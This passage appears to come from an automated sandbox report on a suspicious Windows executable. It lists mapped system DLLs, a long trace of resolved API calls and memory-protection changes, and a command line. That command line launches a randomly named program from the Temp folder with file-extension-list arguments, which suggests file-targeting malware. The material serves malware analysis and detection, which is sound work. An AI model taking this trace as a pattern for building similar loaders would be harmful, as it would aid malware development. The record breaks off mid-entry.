0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7881 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7882 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7883 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7884 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7885 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7886 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7887 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7888 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7889 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7890 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7891 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7892 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7893 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7894 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7895 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7896 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7897 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7898 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8267 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8268 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8269 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 8270 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 8271 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 8272 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8273 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8274 start_va = 0x300000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8275 start_va = 0x1440000 end_va = 0x170efff entry_point = 0x1440000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8276 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 8277 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8278 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 8279 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8280 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8281 start_va = 0x1710000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 8282 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8283 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8377 start_va = 0x17a0000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 8378 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8379 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8485 start_va = 0x18a0000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 8486 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 80 os_tid = 0xdf8 [0116.430] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0116.432] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0116.433] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0116.434] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.435] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.435] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0116.435] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0116.436] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.437] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.437] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0116.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0116.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0116.438] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0116.438] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0116.438] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0116.438] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0116.439] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0116.439] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0116.439] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0116.439] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0116.439] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0116.439] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0116.439] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0116.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0116.439] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0116.440] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0116.440] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0116.440] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0116.440] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0116.440] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0116.440] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0116.440] SetThreadLocale (Locale=0x400) returned 1 [0116.441] GetVersion () returned 0x1db10106 [0116.441] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.441] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0116.441] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.441] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0116.441] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.441] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0116.441] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0116.441] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.441] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", 